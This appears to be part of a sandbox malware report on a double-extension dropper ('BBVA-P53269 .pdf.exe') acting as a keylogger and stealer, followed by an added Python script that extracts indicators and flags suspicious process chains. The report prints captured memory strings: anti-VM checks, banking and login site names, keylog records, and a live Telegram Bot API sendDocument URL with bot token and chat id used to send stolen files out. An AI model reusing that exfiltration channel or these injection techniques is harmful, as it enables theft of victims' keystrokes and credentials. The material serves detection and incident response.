            Source: WebData.6.drBinary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
            Source: AllData.exe, 00000009.00000002.1448506731.00000000024F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Microsoft|VMWare|Virtual
            Source: WebData.6.drBinary or memory string: bankofamerica.comVMware20,11696501413x
            Source: WebData.6.drBinary or memory string: Canara Transaction PasswordVMware20,11696501413}
Source: BBVA-P53269 .pdf.exe, 00000004.00000002.1314117067.000000000143A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll_
Source: WebData.6.dr | Binary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
Source: WebData.6.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696501413x
Source: WebData.6.dr | Binary or memory string: turbotax.intuit.comVMware20,11696501413t
Source: AllData.exe, 00000009.00000002.1447011143.0000000000782000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: WebData.6.dr | Binary or memory string: Interactive userers - HKVMware20,11696501413]
Source: WebData.6.dr | Binary or memory string: outlook.office.comVMware20,11696501413s
Source: WebData.6.dr | Binary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
Source: WebData.6.dr | Binary or memory string: account.microsoft.com/profileVMware20,11696501413u
Source: WebData.6.dr | Binary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
Source: WebData.6.dr | Binary or memory string: Interactive userers - EU WestVMware20,11696501413n
Source: AllData.exe, 00000009.00000002.1448506731.00000000024F8000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMware|VIRTUAL|A M I|Xen
Source: WebData.6.dr | Binary or memory string: ms.portal.azure.comVMware20,11696501413
Source: WebData.6.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413
Source: WebData.6.dr | Binary or memory string: www.interactiveuserers.comVMware20,11696501413}
Source: WebData.6.dr | Binary or memory string: interactiveuserers.co.inVMware20,11696501413d
Source: WebData.6.dr | Binary or memory string: microsoft.visualstudio.comVMware20,11696501413x
Source: WebData.6.dr | Binary or memory string: global block list test formVMware20,11696501413
Source: WebData.6.dr | Binary or memory string: outlook.office365.comVMware20,11696501413t
Source: WebData.6.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
Source: WebData.6.dr | Binary or memory string: interactiveuserers.comVMware20,11696501413
Source: WebData.6.dr | Binary or memory string: discord.comVMware20,11696501413f
Source: WebData.6.dr | Binary or memory string: AMC password management pageVMware20,11696501413
Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exe | Memory allocated: page read and write | page guard
Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Roaming\AllData.exe "C:\Users\user\AppData\Roaming\AllData.exe"
Source: C:\Users\user\AppData\Roaming\AllData.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
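The three "Process created" rows above (a double-extension dropper starting InstallUtil.exe with no arguments, wscript.exe starting an executable out of %AppData%, and that executable starting InstallUtil.exe the same way) and the memory strings listed in this section (Telegram Bot API sendDocument URLs, "caption=DC-KL:::host\user\ip" victim tags and "[HH:MM:SS]<<window title>>" keylog records) are the parts of this report a responder turns into indicators and detections. The script below is an added example, not Joe Sandbox output or code from the sample: it applies those two process-chain rules to constructed events modelled on the rows above, and pulls the Telegram token, chat id, victim tag and keylog records out of constructed strings modelled on the ones in this section. The bot token, chat id, hostname and IP in the sample data are dummies with the same shape as the real ones, not the values from the report.

```python
"""Turn sandbox evidence (process-creation rows and memory strings) into indicators.

Added example; all sample inputs are constructed to mirror the report rows.
"""
import re
from collections import namedtuple

# Telegram Bot API token: <bot id>:<35 chars of [A-Za-z0-9_-]>. The trailing
# lookahead is deliberately omitted: in memory the token is often run together
# with the next string (".../hlYgoProgram Manager>>" in this report).
TOKEN_RE = re.compile(r"(?<!\d)(\d{8,10}):([A-Za-z0-9_-]{35})")
URL_RE = re.compile(r"api\.telegram\.org/bot\d+:[A-Za-z0-9_-]+/(\w+)")
CHAT_RE = re.compile(r"[?&]chat_id=(-?\d+)")
# Upload caption: <kind>:::<host>\<user>\<public ip>
CAPTION_RE = re.compile(
    r"caption=([^:&]+):::([^\\&]+)\\([^\\&]+)\\(\d{1,3}(?:\.\d{1,3}){3})")
# Keylog record: [HH:MM:SS]<<active window title>>; fragments without the
# leading "[" (":28:58]<<Program Manager>>") are truncated and ignored.
KEYLOG_RE = re.compile(r"\[(\d{2}:\d{2}:\d{2})\]<<([^<>]{1,200})>>")

DUMMY_TOKEN = "1234567890:" + "A" * 35  # constructed, same shape as a real token

SAMPLE_STRINGS = [  # constructed, modelled on the memory strings in this section
    "[02:25:18]<<Program Manager>>",
    ":28:58]<<Program Manager>>",  # truncated fragment, must be ignored
    "[02:25:41]<<Untitled - Notepad>>",
    f"https://api.telegram.org/bot{DUMMY_TOKEN}/sendDocument?chat_id=1000000001"
    "&caption=DC-KL:::HOST-PC\\alice\\203.0.113.7",
    f"\\{DUMMY_TOKEN}Program Manager>>",  # token fragment without URL context
]


def extract_telegram(strings):
    """Return bot tokens, chat ids and API methods seen in the strings."""
    tokens, chats, methods = set(), set(), set()
    for s in strings:
        for m in TOKEN_RE.finditer(s):
            tokens.add((m.group(1), m.group(2)))
        for m in URL_RE.finditer(s):
            methods.add(m.group(1))
            chat = CHAT_RE.search(s, m.end())
            if chat:
                chats.add(chat.group(1))
    return {"tokens": sorted(tokens), "chat_ids": sorted(chats),
            "methods": sorted(methods)}


def parse_victim_tag(strings):
    """Return the first caption tag as kind/host/user/ip, or None."""
    for s in strings:
        m = CAPTION_RE.search(s)
        if m:
            return dict(zip(("kind", "host", "user", "ip"), m.groups()))
    return None


def parse_keylog(strings):
    """Return (timestamp, window_title) pairs from complete records only."""
    return [m.groups() for s in strings for m in KEYLOG_RE.finditer(s)]


ProcEvent = namedtuple("ProcEvent", "parent image cmdline")

SAMPLE_EVENTS = [  # constructed from the three "Process created" rows above
    ProcEvent(r"C:\Users\user\Desktop\BBVA-P53269 .pdf.exe",
              r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe",
              r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"'),
    ProcEvent(r"C:\Windows\System32\wscript.exe",
              r"C:\Users\user\AppData\Roaming\AllData.exe",
              r'"C:\Users\user\AppData\Roaming\AllData.exe" '),
    # legitimate-looking use: an installer passes an assembly to InstallUtil
    ProcEvent(r"C:\Windows\System32\cmd.exe",
              r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe",
              r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" /u C:\build\svc.dll'),
]


def flag_process_chain(events):
    """Apply two rules to process-creation events; return (rule, event) pairs."""
    alerts = []
    for ev in events:
        img, parent = ev.image.lower(), ev.parent.lower()
        # InstallUtil.exe normally receives an assembly path; a command line
        # that is only its own path means it was started to host injected code.
        if img.endswith("\\installutil.exe") and ev.cmdline.strip().strip('"').lower() == img:
            alerts.append(("installutil_no_args", ev))
        # A script host starting an executable from a user-writable AppData path.
        if parent.endswith(("\\wscript.exe", "\\cscript.exe")) and "\\appdata\\" in img:
            alerts.append(("script_host_spawns_appdata_exe", ev))
    return alerts


if __name__ == "__main__":
    print(extract_telegram(SAMPLE_STRINGS))
    print(parse_victim_tag(SAMPLE_STRINGS))
    print(parse_keylog(SAMPLE_STRINGS))
    for rule, ev in flag_process_chain(SAMPLE_EVENTS):
        print(rule, ev.image)
```

The token regex is fixed-length on purpose: Telegram tokens are always 35 characters after the colon, so the match survives the fragment at the bottom of this section where the token runs straight into "Program Manager>>". Feed the real strings from the report into the same functions to get the bot id and chat id to report to Telegram's abuse contact and to block at the proxy.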
Source: InstallUtil.exe, 00000006.00000002.3749351723.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C33000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [02:25:18]<<Program Manager>>
Source: InstallUtil.exe, 00000006.00000002.3748268757.0000000000C33000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3751022610.0000000003906000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 1]<<Program Manager>>
Source: InstallUtil.exe, 0000000B.00000002.3749141355.0000000001396000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [02:28:58]<<Program Manager
Source: InstallUtil.exe, 0000000B.00000002.3749141355.00000000013A4000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3749141355.0000000001396000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3749141355.0000000001374000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [02:25:29]<<Program Manager>>
Source: InstallUtil.exe, 0000000B.00000002.3749141355.00000000013A4000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3749141355.0000000001396000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3749141355.0000000001374000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [02:25:40]<<Program Manager>>
Source: InstallUtil.exe, 0000000B.00000002.3750651100.0000000003DA7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerROxtmLu<L3.S
Source: InstallUtil.exe, 00000006.00000002.3749351723.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3750951382.0000000003900000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [02:25:07]<<Program Manager>>
Source: InstallUtil.exe, 0000000B.00000002.3749141355.00000000013A4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [02:25:41]<<Program ManagerHa(b,c,!0)));return a}}function Ha(a,b,c){var d=c||b&2?K:xa,e=!!(b&32);a=Ba(a,b,function(f){return Ga(f,e,d)});G(a,32|(c?2:0));return a};function Ia(a,b){a=a.h;return Ja(a,J(a),b)}function Ja(a,b,c,d){if(-1===c)return null;if(c>=L(b)){if(b&256)return a[a.length-1][c]}else{var e=a.length;if(d&&b&256&&(d=a[e-1][c],null!=d))return d;b=c+((b>>9&1)-1);if(b<e)return a[b]}}function Ka(a,b,c,d,e){var f=L(b);if(c>=f||e){e=b;if(b&256)f=a[a.length-1];else{if(null==d)return;f=a[f+((b>>9&1)-1)]={};e|=256}f[c]=d;e&=-1025;e!==b&&I(a,e)}else a[c+((b>>9&1)-1)]=d,b&256&&(d=a[a.length-1],c in d&&delete d[c]),b&1024&&I(a,b&-1025)}
Source: InstallUtil.exe, 0000000B.00000002.3749141355.0000000001368000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: J2:25:28]<<Program Manager>>
Source: InstallUtil.exe, 00000006.00000002.3751584905.0000000003F33000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3749141355.00000000013A4000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3749141355.0000000001396000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [02:25:30]<<Program Manager>>
Source: InstallUtil.exe, 00000006.00000002.3748268757.0000000000C1C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: :58]<<Program Manager>>
Source: InstallUtil.exe, 0000000B.00000002.3749141355.00000000013A4000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3749141355.0000000001396000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3749141355.0000000001374000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [02:25:41]<<Program Manager>>
Source: InstallUtil.exe, 0000000B.00000002.3749141355.00000000013DA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Managere1?
Source: InstallUtil.exe, 0000000B.00000002.3749141355.00000000013A4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: :28:58]<<Program Manager>>
Source: InstallUtil.exe, 0000000B.00000002.3749141355.00000000013A4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 8:07]<<Program Manager>>
Source: InstallUtil.exe, 0000000B.00000002.3749141355.00000000013A4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [02:28:36]<<Program Manager>>
Source: InstallUtil.exe, 0000000B.00000002.3749141355.0000000001374000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113--:28:58]<<Program Manager>>
Source: InstallUtil.exe, 00000006.00000002.3748268757.0000000000BDC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: -KL:::user-PC\user\8.46.123.189jHBiuDlP6]<<Program Manager>>
Source: InstallUtil.exe, 0000000B.00000002.3749799651.00000000013E4000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3749141355.00000000013A4000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3750851773.0000000003DDF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [02:28:58]<<Program Manager>>
Source: InstallUtil.exe, 0000000B.00000002.3750651100.0000000003DA7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagertxtmLun/oc{
Source: InstallUtil.exe, 0000000B.00000002.3749141355.00000000013A4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: :27:17]<<Program Manager>>
Source: InstallUtil.exe, 0000000B.00000002.3748344854.000000000130C000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3749141355.00000000013DA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [02:28:59]<<Program Manager>>
Source: InstallUtil.exe, 00000006.00000002.3748268757.0000000000C33000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 2]<<Program Manager>>
Source: InstallUtil.exe, 0000000B.00000002.3750651100.0000000003DA7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [02:25:45]<<Program Manager>>K
Source: InstallUtil.exe, 00000006.00000002.3749351723.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C33000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [02:25:08]<<Program Manager>>
Source: InstallUtil.exe, 0000000B.00000002.3749141355.00000000013A4000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3750851773.0000000003DDF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: <<Program Manager>>
Source: InstallUtil.exe, 00000006.00000002.3749351723.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C33000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [02:25:17]<<Program Manager>>
Source: InstallUtil.exe, 0000000B.00000002.3749141355.0000000001368000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [02:25:13]<<Program Manager>
Source: InstallUtil.exe, 0000000B.00000002.3749141355.0000000001374000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: :28:49]<<Program Manager>>
Source: InstallUtil.exe, 0000000B.00000002.3749141355.00000000013A4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 22]<<Program Manager>>
Source: InstallUtil.exe, 0000000B.00000002.3750851773.0000000003DDF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [02:28:01]<<Program Manager>>
Source: InstallUtil.exe, 0000000B.00000002.3750531516.0000000003D7F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [02:26:18]<<Program Manager>>
Source: InstallUtil.exe, 0000000B.00000002.3749141355.00000000013A4000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3749141355.0000000001396000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3749141355.0000000001374000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [02:25:39]<<Program Manager>>
Source: InstallUtil.exe, 0000000B.00000002.3749141355.0000000001368000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [02:28:57]<<Program Manager
Source: KeyDataToUwXAnH.txt.6.dr | Binary or memory string: [02:25:50]<<Program Manager>>
Source: InstallUtil.exe, 0000000B.00000002.3749141355.00000000013A4000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3749141355.0000000001396000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3749141355.0000000001374000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [02:25:38]<<Program Manager>>
Source: InstallUtil.exe, 00000006.00000002.3748268757.0000000000C33000.00000004.00000020.00020000.00000000.sdmp, KeyDataToUwXAnH.txt.6.dr | Binary or memory string: [02:25:51]<<Program Manager>>
Source: InstallUtil.exe, 00000006.00000002.3749351723.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C33000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [02:25:16]<<Program Manager>>
Source: InstallUtil.exe, 0000000B.00000002.3749141355.00000000013A4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [02:26:30]<<Program Manager>>
Source: InstallUtil.exe, 0000000B.00000002.3750851773.0000000003DDF000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3749141355.00000000013DA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [02:28:46]<<Program Manager>>
Source: InstallUtil.exe, 00000006.00000002.3748268757.0000000000BDC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgoProgram Manager>>
Source: InstallUtil.exe, 00000006.00000002.3749351723.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C33000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [02:25:20]<<Program Manager>>
Source: InstallUtil.exe, 00000006.00000002.3751584905.0000000003F33000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113--4f5-b1ed-4060-99b9-fca7ff59c113--32]<<Program Manager>>
Source: InstallUtil.exe, 0000000B.00000002.3750851773.0000000003DDF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: :28:57]<<Program Manager>>
Source: InstallUtil.exe, 0000000B.00000002.3749141355.00000000013A4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 2:28:04]<<Program Manager>>
Source: InstallUtil.exe, 0000000B.00000002.3750851773.0000000003DDF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 3]<<Program Manager>>
Source: KeyDatayMRUSbUX.txt.6.dr | Binary or memory string: [02:25:42]<<Program Manager>>
Source: InstallUtil.exe, 0000000B.00000002.3749141355.00000000013DA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: BDC-KL:::user-PC\user\8.46.123.189jHBiuDlP1]<<Program Manager>>
Source: InstallUtil.exe, 00000006.00000002.3749351723.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C33000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3751584905.0000000003F33000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [02:25:32]<<Program Manager>>
Source: InstallUtil.exe, 0000000B.00000002.3750851773.0000000003DDF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [02:28:33]<<Program Manager>>
Source: InstallUtil.exe, 0000000B.00000002.3750851773.0000000003DDF000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3749141355.0000000001396000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [02:28:44]<<Program Manager>>
Source: InstallUtil.exe, 00000006.00000002.3749351723.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C33000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [02:25:21]<<Program Manager>>
Source: InstallUtil.exe, 0000000B.00000002.3749141355.00000000013DA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager
Source: InstallUtil.exe, 00000006.00000002.3751584905.0000000003F33000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: {"ok":true,"result":{"message_id":439,"from":{"id":7508829218,"is_bot":true,"first_name":"dacloud","username":"gyyfgsugwubot"},"chat":{"id":1342702073,"first_name":"Johhny","last_name":"X","username":"Johnnyx777","type":"private"},"date":1741159561,"document":{"file_name":"KeyDatalyDLsABf.txt","mime_type":"text/plain","file_id":"BQACAgEAAxkDAAIBt2fH_IlLRcKSr7546Qs43976v5otAAJ9BAACSsJBRsiWYcwhfmeWNgQ","file_unique_id":"AgADfQQAAkrCQUY","file_size":363},"caption":"DC- KeyDatalyDLsABf.txt:::user-PC\\user\\8.46.123.189","caption_entities":[{"offset":39,"length":12,"type":"url"}]}}xt/plain","file_id":"BQACAgEAAxkDAAIBqGfH_HPz5pJHrQa8HGEC-jYCzUvRAAJuBAACSsJBRplrzMD4sD7tNgQ","file_unique_id":"AgADbgQAAkrCQUY","file_size":396},"caption":"DC-KL:::user-PC\\user\\8.46.123.189","caption_entities":[{"offset":21,"length":12,"type":"url"}]}}]<<Program Manager>>
Source: InstallUtil.exe, 0000000B.00000002.3750531516.0000000003D7F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: https://api.telegram.org/bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.1892:26:18]<<Program Manager>>
Source: InstallUtil.exe, 0000000B.00000002.3749141355.0000000001374000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [02:28:50]<<Program Manager>>
Source: InstallUtil.exe, 0000000B.00000002.3749141355.00000000013A4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [02:28:18]<<Program Manager>
Source: InstallUtil.exe, 00000006.00000002.3748268757.0000000000BDC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgovwxyzates\user-PC-user\25:30]<<Program Manager>>
Source: InstallUtil.exe, 0000000B.00000002.3749141355.0000000001396000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ffset":21,"length":12,"type":"url"}]}}d04f5-b1ed-4060-99b9-fca7ff59c113--5]<<Program Manager>>
Source: InstallUtil.exe, 00000006.00000002.3749351723.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3751584905.0000000003F33000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [02:25:59]<<Program Manager>>
Source: InstallUtil.exe, 0000000B.00000002.3750851773.0000000003DDF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 02:28:27]<<Program Manager>>
Source: InstallUtil.exe, 0000000B.00000002.3749141355.0000000001374000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: l"}]}}-5]<<Program Manager>>
Source: InstallUtil.exe, 0000000B.00000002.3750851773.0000000003DDF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [02:28:27]<<Program Manager>>
Source: InstallUtil.exe, 00000006.00000002.3749351723.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, KeyDatayWFuRDZM.txt.6.dr | Binary or memory string: [02:25:48]<<Program Manager>>
Source: InstallUtil.exe, 0000000B.00000002.3749141355.00000000013A4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [02:28:16]<<Program Manager>>
Source: InstallUtil.exe, 0000000B.00000002.3749141355.00000000013DA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: BDC-KL:::user-PC\user\8.46.123.189jHBiuDlP7]<<Program Manager>>
Source: InstallUtil.exe, 0000000B.00000002.3748344854.000000000130C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [02:29:00]<<Program Manager
Source: InstallUtil.exe, 00000006.00000002.3749351723.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C33000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [02:25:15]<<Program Manager>>
Source: InstallUtil.exe, 00000006.00000002.3749351723.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3750951382.0000000003900000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [02:25:04]<<Program Manager>>
Source: InstallUtil.exe, 0000000B.00000002.3749141355.00000000013A4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [02:25:41]<<Program Manager>>er>>
Source: InstallUtil.exe, 00000006.00000002.3749351723.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C33000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [02:25:14]<<Program Manager>>
Source: InstallUtil.exe, 0000000B.00000002.3749141355.00000000013A4000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3749141355.0000000001374000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: "}]}}d04f5-b1ed-4060-99b9-fca7ff59c113--:13]<<Program Manager>>
Source: InstallUtil.exe, 0000000B.00000002.3750851773.0000000003DDF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [02:28:51]<<Program Manager>>
Source: InstallUtil.exe, 0000000B.00000002.3749141355.00000000013A4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 16]<<Program Manager>>
Source: InstallUtil.exe, 00000006.00000002.3751584905.0000000003F33000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113--11]<<Program Manager>>
Source: InstallUtil.exe, 00000006.00000002.3749351723.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C33000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [02:25:22]<<Program Manager>>
Source: InstallUtil.exe, 00000006.00000002.3749351723.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3750951382.0000000003900000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [02:25:06]<<Program Manager>>
Source: InstallUtil.exe, 00000006.00000002.3749351723.0000000000C69000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: :25:48]<<Program Manager>>
Source: InstallUtil.exe, 00000006.00000002.3751175605.0000000003942000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagertxtmLun/oc
Source: InstallUtil.exe, 0000000B.00000002.3749141355.00000000013A4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [02:28:58AAK6BAACSsJBRp2TdEHD-ruiNgQ","file_unique_id":"AgADugQAAkrCQUY","file_size":363},"caption":"DC-KL:::user-PC\\user\\8.46.123.189","caption_entities":[{"offset":21,"length":12,"type":"url"}]}}--f5-b1ed-4060-99b9-fca7ff59c113--3]<<Program Manager>>
Source: InstallUtil.exe, 0000000B.00000002.3749141355.00000000013A4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: :28:16]<<Program Manager>>
Source: InstallUtil.exe, 0000000B.00000002.3750851773.0000000003DDF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [02:28:35]<<Program Manager>>
Source: InstallUtil.exe, 00000006.00000002.3749351723.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, KeyDatayWFuRDZM.txt.6.dr | Binary or memory string: [02:25:49]<<Program Manager>>
